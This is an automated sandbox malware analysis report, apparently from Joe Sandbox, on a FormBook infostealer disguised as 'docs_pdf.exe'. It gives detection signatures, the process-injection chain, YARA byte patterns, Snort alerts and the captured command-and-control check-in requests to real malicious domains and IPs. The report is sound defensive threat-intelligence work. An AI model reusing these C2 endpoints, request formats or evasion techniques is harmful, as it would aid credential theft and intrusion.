

Windows Analysis Report
docs_pdf.exe

Overview

General Information

Sample name: docs_pdf.exe
Analysis ID: 1472519
MD5: 4a7d2fd983aa91d5d3b7bec3c430a825
SHA1: 34d5c4c7e639a9cd89dc857dc2322f3a86962a3e
SHA256: b193b97622b50825390d67d4bc9ae41c2da72c2c7f2beeb3b9fb0666fe892ae1
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • docs_pdf.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 4A7D2FD983AA91D5D3B7BEC3C430A825)
    • svchost.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HDtHilbfKZE.exe (PID: 4544 cmdline: "C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 4932 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • HDtHilbfKZE.exe (PID: 5396 cmdline: "C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2acb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d963:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16e72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e763:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17c72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 2644, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5672, ProcessName: svchost.exe
Source: Process started Author: vburov: Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 2644, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5672, ProcessName: svchost.exe
            Timestamp:07/13/24-00:03:27.012872
            SID:2855465
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:53.802060
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:33.327718
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:02:48.729631
            SID:2855465
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:54.908226
            SID:2855465
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:28.251797
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:40.530049
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:46.484649
            SID:2855465
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:03:13.390597
            SID:2855465
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:00.043647
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:06.889781
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:14.257772
            SID:2855465
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:05:41.372349
            SID:2855465
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:04:20.054098
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected


            AV Detection

Source: docs_pdf.exe ReversingLabs: Detection: 65%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: docs_pdf.exe Joe Sandbox ML: detected
Source: docs_pdf.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDtHilbfKZE.exe, 00000004.00000000.2413958648.000000000008E000.00000002.00000001.01000000.00000005.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2554531949.000000000008E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00154696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00154696
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015C93C FindFirstFileW,FindClose, 0_2_0015C93C
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0015C9C7
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0015F200
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0015F35D
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0015F65E
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00153A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00153A2B
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_00153D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00153D4E
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0015BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0015BF27
Source: C:\Windows\SysWOW64\isoburn.exe Code function: 5_2_0081BF20 FindFirstFileW,FindNextFileW,FindClose, 5_2_0081BF20
Source: C:\Windows\SysWOW64\isoburn.exe Code function: 4x nop then xor eax, eax 5_2_00809790
Source: C:\Windows\SysWOW64\isoburn.exe Code function: 4x nop then mov ebx, 00000004h 5_2_0468053E

            Networking

Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 162.43.105.95:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49728 -> 37.9.175.173:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 203.161.41.207:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49747 -> 51.89.93.192:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49751 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49755 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49759 -> 45.130.41.38:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49763 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49768 -> 3.33.130.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49772 -> 103.176.91.154:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49776 -> 5.78.41.174:80
            Source: DNS query: www.hectmalt.xyz
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3
Source: Joe Sandbox View ASN Name: PARSONLINETehran-IRANIR
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View ASN Name: CYBERTRAILSUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WEBSUPPORT-SRO-SK-ASSK
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_001625E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_001625E2
            Source: global trafficHTTP traffic detected: GET /b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.yexz60.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.sodnavisystem.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.gymroom.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.hectmalt.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.bearclaw.botAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /wlsq/?D0Pts04=9G9JaQreu1q7pVWdntSqemfrZt4YMEwdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYxH4zd6/SeR7TYZgVkfp3oOFdRtlOKMiyqIOaPcilhWS9JI76xLs=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.noghteyab.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /22y6/?D0Pts04=ICuY/wpnSFLYWqZfe4Os/gHcG43vkkyt4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMOqMkXFbmJEqSPlZqGaa0hprb88Yx6Msm+f4viNx2oGL3e10rb/0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.mcpcrecycling.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /fwdd/?D0Pts04=K/pqHoAOWNF4P+w85wWHM/iowpzI4zdOarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTM8AeJPJZyoLpuu1Q/5znf4Q/4KQ0LClPCb/j5/YCrPSLvGMpclo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.evoolihubs.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.shaf-kupe-msk.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.quixaclienti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.789bet1okvip.solutionsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /8c7z/?D0Pts04=syard6w4RGgVSvsj/+94Ua9P+14Y627l/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVIwI+KCZPvpwqIuyBIvsqSHtYdkfPbGRUiwx+Cm8V2ixEWZMlegI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.334es.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
            Source: global trafficHTTP traffic detected: GET /6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
